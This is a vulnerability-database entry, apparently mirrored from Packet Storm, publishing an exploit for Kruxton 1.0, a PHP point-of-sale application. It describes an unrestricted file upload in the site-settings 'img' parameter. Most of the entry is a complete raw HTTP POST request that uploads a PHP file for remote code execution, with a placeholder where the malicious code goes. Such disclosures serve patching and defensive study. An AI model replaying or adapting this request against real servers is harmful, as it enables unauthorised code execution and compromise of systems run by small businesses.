Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:178057
HistoryApr 15, 2024 - 12:00 a.m.

Kruxton 1.0 Shell Upload

2024-04-1500:00:00
nu11secur1ty
packetstormsecurity.com
26
kruxton 1.0
mayurik.com
file upload
rce
php
vulnerability
security problem
vendor
exploit
injection

7.4 High

AI Score

Confidence

Low

JSON
`## Title: kruxton-1.0-FileUpload-RCE  
## Author: nu11secur1ty  
## Date: 04/15/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
## Reference: https://portswigger.net/web-security/file-upload  
  
## Description:  
The system setting with parameter IMG is vulnerable to File Upload  
vulnerability.  
The attacker can upload a very malicious PHP file into the server and  
then he can execute it  
This is a potential CRITICAL PROBLEM!  
  
STATUS: HIGH- Vulnerability  
  
[+]Payload:  
```POST  
POST /kruxton/ajax.php?action=save_settings HTTP/1.1  
Host: localpwnedhost.com  
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;  
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1  
Content-Length: 1043  
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"  
Accept: */*  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://localpwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=1, i  
Connection: close  
  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="name"  
  
Kruxton Bristo By Mayuri K  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="email"  
[email protected]  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="contact"  
  
9000000000  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="about"  
  
<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:  
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:  
sans-serif;">Powered by <a  
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala  
Editor">Froala Editor</a></p>  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream  
  
<?php  
// by nu11secur1ty - 2024  
//Your malicious code here  
?>  
  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq--  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)  
  
## Time spent:  
00:15:00  
  
  
`

7.4 High

AI Score

Confidence

Low

JSON